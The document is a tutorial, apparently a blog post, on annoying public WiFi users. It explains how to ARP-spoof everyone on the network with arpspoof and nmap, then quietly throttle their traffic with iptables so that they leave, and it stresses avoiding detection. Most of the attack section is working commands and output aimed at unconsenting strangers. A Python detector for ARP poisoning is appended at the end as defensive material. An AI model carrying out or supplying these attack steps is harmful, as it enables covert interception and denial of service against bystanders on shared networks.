How To Annoy Public WiFi Users
You're connected to a Public WiFi connection and realize how abysmally slow it's become. Is it the kids watching Netflix? Is it the hipster live streaming his food? Or the pirate bit-torrenting in the corner? It really doesn't matter ... you're about to grind everyone else's connections to a near halt in the hopes they'll pack up and leave. NOTE: This can also be handy to get rid of people parked at your local coffee shop hogging all the comfy chairs or power outlets.
Now, a simple ARP spoofing operation can drive all their traffic to you, where you can drop it, leaving them with no data at all. But then it would be obvious that you're the only user with a working connection. Another problem with a complete denial of service is that the victims might complain to the host. That would draw attention to the access point working fine, leading to the possible conclusion that somebody is hacking. A better option would be to intercept everyone's traffic and then simply slow them down so they think the WiFi is working fine but that everyone else is hogging the bandwidth.
Needed Tools (all of this is native to Kali):
- ARP Spoofer like arpspoof from dsniff
- Network Scanner like nmap
- Packet Filter with rate limiting controls like iptables
For any of this to work, your machine must forward the packets it receives so that it becomes a "man in the middle." You must enable IP packet forwarding with this simple command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now identify all the people present on the network to mess with. Now that firewalls are more prevalent these days, a simple port scan may not be enough to identify hosts since your query packets will be ignored. However, flushing the currently cached ARP table, doing a quick scan of the subnet, and then reviewing the freshly populated ARP table will always reveal all the nodes. The following example commands demonstrate flushing and scanning a common 192.168.1.* private subnet.
Flush the ARP cache using the
root@EVILBOX:~# ip -s neighbor flush all
*** Round 1, deleting 16 entries ***
*** Flush is complete after 1 round ***
Conduct a quick scan of all the devices on the subnet to force populate the ARP table:
root@EVILBOX:~# nmap -sL 192.168.1.*
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-15 21:40 EDT
Nmap scan report for 192.168.1.0
Nmap scan report for 192.168.1.1
Nmap scan report for 192.168.1.2
....
Nmap scan report for 192.168.1.253
Nmap scan report for 192.168.1.254
Nmap scan report for 192.168.1.255
View the freshly populated ARP cache:
root@EVILBOX:~# arp -a
? (192.168.1.5) at dc:85:de:f6:a8:47 on [ether] on wlan0
? (192.168.1.4) at c8:69:cd:98:17:68 on [ether] on wlan0
_gateway (192.168.1.1) at 1c:1b:d:56:fc:f1 on [ether] on wlan0
At this point, you can begin picking victims out of the ARP cache results and start ARP spoofing in order to make all the traffic from the public WiFi spot's users get directed through your machine. The following command instructs arpspoof to forward bi-directional traffic between a target and a router.
root@EVILBOX:~# arpspoof -t 192.168.1.4 -r 192.168.1.1
Now all of the traffic between 192.168.1.4 and the router is getting forwarded through your machine. After flushing the FORWARD chain, set two quick iptables rules in order to slow down the target's perceived connection. You can tweak the allowed packets per second setting to identify a threshold where the target thinks the connection is working but is just abysmally slow. These rules will not impact your connection at all, as the FORWARD chain is only associated with packet forwarding and your connection utilizes the
root@EVILBOX:~# iptables -F FORWARD
root@EVILBOX:~# iptables -A FORWARD --match limit \
    --limit 1/sec --limit-burst 1 -j ACCEPT
root@EVILBOX:~# iptables -A FORWARD -j REJECT
Repeat the ARP spoofing steps for each targeted IP address. The iptables rules can be refined further with specific source and destination addresses to really tweak who gets throttled the most. You should be able to use manufacturer codes and visual product identification to isolate different users. Don't forget to look around frustrated so everyone else thinks your connection is lagging as well.
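From the defender's side, the poisoning described above is visible in the same `arp -a` output used earlier: on an affected client, the gateway's IP starts resolving to another client's MAC. The following is an added example, not part of the original post; it parses that output format and flags the pattern. The function names and the sample tables are constructed for illustration.

```python
import re
from collections import defaultdict

# One resolved `arp -a` row, e.g. "_gateway (192.168.1.1) at 1c:1b:... [ether] on wlan0".
ARP_ROW = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+"
    r"(?P<mac>[0-9A-Fa-f]{1,2}(?::[0-9A-Fa-f]{1,2}){5})\b")

def normalize_mac(mac):
    """Lowercase and zero-pad octets so 1c:1b:d:... compares equal to 1c:1b:0d:..."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))

def parse_arp_table(text):
    """Return {ip: mac}; rows without a MAC (<incomplete>) are skipped."""
    return {m["ip"]: normalize_mac(m["mac"]) for m in ARP_ROW.finditer(text)}

def find_spoofing(table, gateway_ip, pinned_gateway_mac=None):
    """Flag MACs claimed by several IPs and a gateway MAC that differs from a pinned one."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:  # can be legitimate (multi-homed host, proxy ARP); review it
            findings.append(("duplicate_mac", mac, sorted(ips)))
    seen = table.get(gateway_ip)
    if pinned_gateway_mac and seen and seen != normalize_mac(pinned_gateway_mac):
        findings.append(("gateway_mac_changed", seen, [gateway_ip]))
    return findings

# Constructed sample tables (locally administered MACs, not real devices).
CLEAN = """\
? (192.168.1.5) at 02:00:00:00:00:05 [ether] on wlan0
? (192.168.1.4) at 02:00:00:00:00:04 [ether] on wlan0
? (192.168.1.9) at <incomplete> on wlan0
_gateway (192.168.1.1) at 02:00:00:00:00:01 [ether] on wlan0
"""
# Same network as seen by a client whose gateway entry has been poisoned.
POISONED = CLEAN.replace("02:00:00:00:00:01", "02:00:00:00:00:05")

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("poisoned", POISONED)):
        hits = find_spoofing(parse_arp_table(sample), "192.168.1.1", "02:00:00:00:00:01")
        print(name, hits or "no findings")
```

Pinning requires recording the gateway MAC while the network is known to be good. On the access point itself, client isolation or dynamic ARP inspection stops the poisoning at the source.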